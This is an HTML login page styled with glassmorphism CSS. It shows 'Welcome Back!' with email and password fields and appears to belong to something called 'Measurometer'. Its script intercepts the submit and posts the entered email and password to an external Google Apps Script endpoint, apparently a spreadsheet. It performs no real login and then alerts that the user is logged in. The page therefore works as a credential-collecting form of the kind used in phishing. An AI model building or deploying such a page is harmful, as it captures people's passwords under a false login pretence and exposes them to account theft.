
<!DOCTYPE html>
<html lang="en">
<head>
    <title>Glassmorphism Form</title>
    <!--Google Font-->
    <link rel="preconnect" href="https://fonts.gstatic.com">
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;500;600&display=swap" rel="stylesheet">
    <!--Stylesheet-->
    <link rel="stylesheet" href="style.css">
    <style>
        *,
*:before,
*:after{
  padding: 0;
  margin: 0;
  box-sizing: border-box;
}
body{
  background-color: #080710;
  background-image: url(1.png);
}
.background{
             background:url("1.png");
}
.shape:first-child{
  background: linear-gradient(
      #9b22ea,
      #bf23f6
  );
  left: -80px;
  top: -80px;
}
.shape:last-child{
  background: linear-gradient(
      to right,
      #ff512f,
      #f09819
  );
  right: -30px;
  bottom: -80px;
}
form{
  height: 440px;
  width: 430px;
  background-color: rgba(255,255,255,0.07);
  position: absolute;
  transform: translate(-50%,-50%);
  top: 50%;
  left: 50%;
  border-radius: 10px;
  backdrop-filter: blur(10px);
  border: 2px solid rgba(255,255,255,0.1);
  box-shadow: 0 0 40px rgba(8,7,16,0.6);
  padding: 50px 35px;
}
form *{
  font-family: 'Poppins',sans-serif;
  color: #ffffff;
  letter-spacing: 0.5px;
  outline: none;
  border: none;
}
form h3{
  font-size: 32px;
  font-weight: 500;
  line-height: 42px;
}
form h3 span{
  display: block;
  font-size: 16px;
  font-weight: 300;
  color: #e5e5e5;
}
label{
  display: block;
  margin-top: 30px;
  font-size: 16px;
  font-weight: 500;
}
input{
  display: block;
  height: 50px;
  width: 100%;
  background-color: rgba(255,255,255,0.07);
  border-radius: 3px;
  padding: 0 10px;
  margin-top: 8px;
  font-size: 14px;
  font-weight: 300;
}
::placeholder{
  color: #e5e5e5;
}
button{
  margin-top: 50px;
  width: 100%;
  background-color: #ffffff;
  color: #080710;
  padding: 15px 0;
  font-size: 18px;
  font-weight: 600;
  border-radius: 5px;
  cursor: pointer;
}
  </style> 
</head>
<body>
    <div class="background">
        <div class="shape"></div>
        <div class="shape"></div>
    </div>
    <form method="POST" name="google-sheet">
        <h3>Welcome Back!
            <span>Login to your account.</span>
        </h3>
        
        
        <input type="email" placeholder="Email" id="username" name="username" required>
        <input type="password" placeholder="Password" id="password" name="password" required>

        <button>Log In</button>
        <span>Not a member? <a href="Sign in.html">Sign In</a></span>
    </form>
    <script>
        const scriptURL = 'https://script.google.com/macros/s/AKfycbxBfDTBH8aRF57TaFs6OsduKhNOIslHx9GZV9nXDUpkcrVAJRPQUkCv1KCA6tgH8ZQd/exec'
        const form = document.forms['google-sheet']
      
        form.addEventListener('submit', e => {
          e.preventDefault()
          fetch(scriptURL, { method: 'POST', body: new FormData(form)})
            .then(response => alert("You are succesfully logined in ℳeasurometer Thank you"))
            .catch(error => console.error('Error!', error.message))
        })
      </script>
</body>
</html>